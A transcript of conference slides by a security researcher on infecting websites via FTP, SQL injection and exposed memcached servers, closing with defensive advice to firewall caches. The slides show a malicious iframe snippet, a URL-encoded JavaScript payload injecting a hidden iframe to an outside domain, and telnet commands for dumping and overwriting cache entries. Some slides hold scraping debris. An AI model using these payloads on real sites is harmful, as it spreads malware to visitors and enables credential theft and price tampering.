[FTP|SQL|Cache] Injections


  1. [FTP|SQL|Cache] Injections. David Barroso, Head of Security Intelligence, Telefonica Digital
  2. Image source: http://www.iframeinjectionattack.com/how-to-remove-this-site-may-harm-your-computer.html
  3. Agenda: Introduction, Cache basics, Demo, Summary
  4. How can I infect a website? Or: how can I forward its visitors to a webpage I control?
  5. MPack infection flow (diagram):
     • The attacker compromises a legitimate web server (www.mydomain.com) and injects an iframe.
     • The visitor browses the normal website, which now carries the malicious iframe.
     • The visitor is forwarded to an infection kit (MPack).
     • The malcode connects back to the C&C.
  6. First option (difficulty: easy)
  9. SQL injection (difficulty: easy)
  14. Things to bear in mind:
      • Which users do I want to infect? Focus your efforts (example: Brazilian webpages).
      • SEO and web ranking: Alexa ranking.
      • It's not only about infection; sometimes it's only about web ranking: spam comments in blogs, playing with HTML entities (e.g. <noscript>).
  15. Second option (difficulty: medium)
  22. Choose your preferred infection kit. 99% are LAMP: Linux + Apache + MySQL + PHP
  28. 28. ddddddasdfsdf Simple: <iframe src=‘http://www.malicious.com’></iframe> Not so simple:<Script Language=Javascript> 27% document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%6 73%3%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%3E%3C%2F%69%66%72%61%6D%65%3E));</Script>
  29. And how is a web cache related? Specifically: memcached
  30. Cache: "a component that transparently stores data so that future requests for that data can be served faster. The data that is stored within a cache might be values that have been computed earlier or duplicates of original values that are stored elsewhere." (Wikipedia) Examples: CPU, disk, DNS, ARP, etc. Main security attack: poisoning.
  32. memcached:
      • Created in 2003 for LiveJournal
      • Associative array (hash table)
      • Used by YouTube, Reddit, Facebook, Orange, Twitter, etc.
      • Memory-based
      • Keys up to 250 bytes, values up to 1 MB
      • Default port: 11211/tcp
      • No authentication
      • Some caches are exposed on the Internet
      • Optional (not often used): SASL
  33. Telnet-based commands:
      • set <key> <flags> <timeout> <bytes>
      • get <key>
      • stats
      • stats items
      • stats cachedump
  34. SensePost analyzed the security issues back in 2010 and developed go-derper.rb:
      • Identification
      • Storage of keys and values
      • Regular expressions
      • It can overwrite existing keys and values
      Main problems:
      • Which web app is using these data?
      • How can I find 'interesting' data?
  35. Infections: malicious iFrame/JS injection. Confidential information: passwords, prices!
  36. Let's see some practical stuff. Take care with all those memcached instances!
  37. Demo: memcached access, key/value storage
  38. Telnet session (the 11 is the byte count of the data line that follows; n is a slab id reported by stats items):
      set FIRST 0 0 11
      Hello FIRST
      get FIRST
      stats items
      stats cachedump n 10
  39. 39. ddddddasdfsdfDemo Overwriting values 27% (iFrame – infection kit) 73%
  40. 40. ddddddasdfsdf iFrame injection 27% 73%
  41. 41. ddddddasdfsdfDemo Password sniffing 27% Data mangling (prices) 73%
  42. 42. ddddddasdfsdf Password sniffing 27% 73%
  43. 43. ddddddasdfsdf Data mangling (prices) 27% 73%
  44. 44. ddddddasdfsdf Data mangling (prices) 27% 73%
  45. 45. ddddddasdfsdf 27% 73%Source: http://www.sensepost.com/blog/4873.html
  46. 46. ddddddasdfsdf CacheT: an alternative to FTP-Toolz and SQL Injection Kitz go-derper.rb patch Proof of concept 27% Once you find some memcached hosts(nmap) 73% entries  Dump of all their  Look for HTML data  Malicious injection (iFrame/JavaScript) Not published yet (only malicious purposes)
  47. 47. ddddddasdfsdf Protect your memcached from external access  Firewall  Listen only to localhost We haven’t seen malicious infections using theses caches  But it’s a very attractive asset, because many of the large 27% websites are using it  From the malicious point of view, it doesn’t mind if you don’t 73% know which webapp is behind It’s very easy to code a tool scanning for open memcached (or similar caches) and then infect all of them  nmap + go-derper.rb
  48. Obrigado (thank you). David Barroso, @lostinsecurity
